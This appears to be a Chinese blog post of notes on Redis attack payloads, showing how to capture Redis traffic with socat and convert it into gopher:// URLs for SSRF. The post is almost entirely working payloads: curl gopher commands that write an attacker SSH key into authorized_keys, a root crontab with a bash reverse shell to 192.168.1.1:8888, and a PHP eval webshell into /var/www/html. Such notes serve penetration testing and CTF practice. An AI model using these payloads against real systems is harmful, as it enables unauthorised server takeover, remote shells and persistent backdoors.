zoukankan      html  css  js  c++  java
  • redis payload笔记

    抓去流量的方法

    1.安装redis与socat

    2.启动redis,使用socat对redis的流量做一下转发

    socat -v tcp-listen:4444,fork tcp-connect:127.0.1:6379

    然后

    redis-cli -p 4444

    输入如下命令

    flushall
    config set dir /home/redis/.ssh/
    config set dbfilename authorized_keys
    set x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d"
    save

    获取大致如下的流量

    *1
    $8
    flushall
    < 2020/04/24 19:57:32.273053  length=5 from=0 to=4
    +OK
    > 2020/04/24 19:57:38.830175  length=58 from=18 to=75
    *4
    $6
    config
    $3
    set
    $3
    dir
    $17
    /home/redis/.ssh/
    < 2020/04/24 19:57:38.830886  length=5 from=5 to=9
    +OK
    > 2020/04/24 19:57:44.688296  length=64 from=76 to=139
    *4
    $6
    config
    $3
    set
    $10
    dbfilename
    $15
    authorized_keys
    < 2020/04/24 19:57:44.688847  length=5 from=10 to=14
    +OK
    > 2020/04/24 19:57:51.586985  length=430 from=140 to=569
    *3
    $3
    set
    $1
    x
    $402
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d
    < 2020/04/24 19:57:51.588584  length=5 from=15 to=19
    +OK
    > 2020/04/24 19:58:01.597515  length=14 from=570 to=583
    *1
    $4
    save
    < 2020/04/24 19:58:01.600311  length=5 from=20 to=24
    +OK
    

    3.将多余部分删除,换行 替换为%0d%0a,空格变为%20,大致处理为如下格式

    *1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a

    4.执行

    curl -v "gopher://127.0.0.1:6379/*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
    "

    写计划任务

    命令行

    flushall
    
    set x "
    * * * * * bash -i >& /dev/tcp/192.168.1.1/8888 0>&1
    "
    
    config set dir /var/spool/cron/
    
    config set dbfilename root
    
    save

    gopher

    curl -v "gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/192.168.1.1/8888>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a"

    写webshell

    命令行

    flushall
    
    set x "<?php eval($_POST[c]);?>"
    
    config set dir /var/www/html
    
    config set dbfilename shell.php
    
    save

    gopher

    gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$25%0d%0a%3C%3Fphp%20%40eval(%24_POST%5Bc%5D)%3B%3F%3E%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$13%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
  • 相关阅读:
    Java堆、栈和常量池
    Java多线程内存模型
    To-do List
    Java Collections Framework 汇总
    关于ArrayList.clear()与=null以及new ArrayList<E>()
    开源协议
    git-svn — 让git和svn协同工作
    Java Collections Framework 之 RandomAccess接口
    转 : CSS Modules详解及React中实践
    转 : JBoss Web和 Tomcat的区别
  • 原文地址:https://www.cnblogs.com/kagari/p/12213448.html
Copyright © 2011-2022 走看看